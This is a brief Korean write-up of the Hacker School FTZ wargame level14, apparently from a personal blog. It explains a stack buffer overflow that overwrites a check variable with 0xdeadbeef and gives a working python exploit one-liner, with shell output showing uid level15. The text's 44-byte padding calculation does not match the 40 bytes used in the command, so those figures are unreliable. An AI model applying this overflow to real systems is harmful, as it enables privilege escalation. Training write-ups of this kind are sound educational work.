[Hacker school FTZ] Level14 -> Level15

buf의 공간은 20byte인데 fgets로 stdin에서 최대 45byte까지 입력받은 뒤

check의 값이 0xdeadbeef인지 확인하고 맞으면 쉘을 띄워준다.

[그림 1]

[그림 1]을 보면 check가 ebp-16, buf가 ebp-60이니까 60-16=44Byte를 더미로 주고 그 후 부터 0xdeadbeef를 체우면 메인함수를 정상종료 시킬 수 있다.

--풀이--

[level14@ftz tmp]$ (python -c 'print "A"*40+"\xef\xbe\xad\xde"';cat)|../attackme

id

uid=3095(level15) gid=3094(level14) groups=3094(level14)

my-pass

Level15 Password is "----- ----".